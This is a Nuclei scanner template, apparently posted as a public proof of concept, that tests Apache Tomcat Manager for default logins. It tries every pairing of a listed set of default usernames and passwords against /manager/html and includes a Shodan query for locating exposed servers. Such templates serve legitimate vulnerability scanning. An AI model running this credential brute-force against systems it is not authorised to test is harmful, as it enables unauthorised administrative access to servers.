漏洞描述
Apache Tomcat Manager default login credentials were discovered. This template checks for multiple variations.
tomcat-default-login: Apache Tomcat Manager Default Login
PoC代码[已公开]
id: tomcat-default-login
info:
name: Apache Tomcat Manager Default Login
author: pdteam,sinKettu,nybble04
severity: high
description: Apache Tomcat Manager default login credentials were discovered. This template checks for multiple variations.
reference:
- https://www.rapid7.com/db/vulnerabilities/apache-tomcat-default-ovwebusr-password/
- https://github.com/danielmiessler/SecLists/blob/master/Passwords/Default-Credentials/tomcat-betterdefaultpasslist.txt
classification:
cpe: cpe:2.3:a:apache:tomcat:*:*:*:*:*:*:*:*
metadata:
max-request: 405
vendor: apache
product: tomcat
shodan-query: title:"Apache Tomcat"
tags: tomcat,apache,default-login,vuln
http:
- raw:
- |
GET /manager/html HTTP/1.1
Host: {{Hostname}}
Authorization: Basic {{base64(username + ':' + password)}}
payloads:
username:
- ADMIN
- QCC
- admin
- both
- cxsdk
- demo
- j2deployer
- manager
- ovwebusr
- role
- role1
- root
- server_admin
- tomcat
- xampp
password:
- ADMIN
- OvW*busr1
- Password1
- QLogic66
- admanager
- admin
- adrole1
- adroot
- ads3cret
- adtomcat
- advagrant
- changethis
- demo
- j2deployer
- kdsxc
- manager
- owaspbwa
- password
- password1
- r00t
- role1
- root
- s3cret
- tomcat
- toor
- vagrant
- xampp
attack: clusterbomb # Available options: sniper, pitchfork and clusterbomb
threads: 30
matchers-condition: and
matchers:
- type: word
part: body
words:
- "Apache Tomcat"
- "Server Information"
condition: and
- type: word
part: body
words:
- "Tomcat Version"
- "JVM Version"
- "JVM Vendor"
- "OS Name"
- "OS Version"
- "OS Architecture"
- "Hostname"
- "IP Address"
condition: or
- type: status
status:
- 200
# digest: 4a0a0047304502210087a2cf9ba1b91098afb27b6a048e3e5302a7ee589f41026d56747e61c9904ffb02203b940e873f079479c30415912b91edf8850fa5454a970874b92cb9e62e2cb7a6:922c64590222798bb761d5b6d8e72950